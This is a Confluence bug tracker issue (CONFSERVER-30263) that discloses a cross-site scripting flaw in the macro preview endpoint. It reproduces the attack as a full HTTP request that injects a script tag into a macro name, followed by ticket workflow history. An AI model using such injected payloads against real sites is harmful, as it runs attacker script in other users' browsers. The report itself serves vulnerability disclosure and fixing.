Example:

      • insert lorem ipsum macro
      • edit macro in lightbox and press preview
      • alter the post request as follows:

      POST /confluence/rest/tinymce/1/macro/preview HTTP/1.1
      Host: test.foo.com
      Connection: keep-alive
      Content-Length: 136
      Accept: text/html, /; q=0.01
      Origin: https://test.foo.com
      X-Requested-With: XMLHttpRequest
      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.43 Safari/537.31
      Content-Type: application/json; charset=UTF-8
      Referer: https://test.foo.com/confluence/pages/editpage.action?pageId=123456
      Accept-Encoding: gzip,deflate,sdch
      Accept-Language: de-DE,de;q=0.8,en-US;q=0.6,en;q=0.4
      Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
      Cookie: [...]

      {"contentId":"12345","macro":{"name":"lorem-ipsum<script>alert(1)</script>","body":""}}

      • an alert box pops up

      This kind of attack works for all macros available

            [CONFSERVER-30263] XSS attack in macro rendering preview

            Katherine Yabut made changes -
            Workflow Original: JAC Bug Workflow v3 [ 2875337 ] New: CONFSERVER Bug Workflow v4 [ 3003740 ]
            Owen made changes -
            Workflow Original: JAC Bug Workflow v2 [ 2803304 ] New: JAC Bug Workflow v3 [ 2875337 ]
            Status Original: Resolved [ 5 ] New: Closed [ 6 ]
            Owen made changes -
            Workflow Original: JAC Bug Workflow [ 2735992 ] New: JAC Bug Workflow v2 [ 2803304 ]
            Owen made changes -
            Workflow Original: Confluence Workflow - Public Facing - Restricted v5 - TEMP [ 2400890 ] New: JAC Bug Workflow [ 2735992 ]
            Alex Yakovlev (Inactive) made changes -
            Labels Original: affects-server bugfix cvss-high editor loyalty security xss New: affects-server cvss-high editor loyalty security xss
            Alex Yakovlev (Inactive) made changes -
            Labels Original: affects-server bugfix cvss-high editor security xss New: affects-server bugfix cvss-high editor loyalty security xss
            Katherine Yabut made changes -
            Workflow Original: Confluence Workflow - Public Facing - Restricted v5 [ 2300702 ] New: Confluence Workflow - Public Facing - Restricted v5 - TEMP [ 2400890 ]
            Katherine Yabut made changes -
            Workflow Original: Confluence Workflow - Public Facing - Restricted v5.1 - TEMP [ 2234701 ] New: Confluence Workflow - Public Facing - Restricted v5 [ 2300702 ]
            Katherine Yabut made changes -
            Workflow Original: Confluence Workflow - Public Facing - Restricted v5 - TEMP [ 2197419 ] New: Confluence Workflow - Public Facing - Restricted v5.1 - TEMP [ 2234701 ]
            Katherine Yabut made changes -
            Workflow Original: Confluence Workflow - Public Facing - Restricted v5 [ 1922840 ] New: Confluence Workflow - Public Facing - Restricted v5 - TEMP [ 2197419 ]

              alwang Alice Wang (Inactive)
              957164863928 Bernd Schaper
              Affected customers:
              0 This affects my team
              Watchers:
              5 Start watching this issue

                Created:
                Updated:
                Resolved: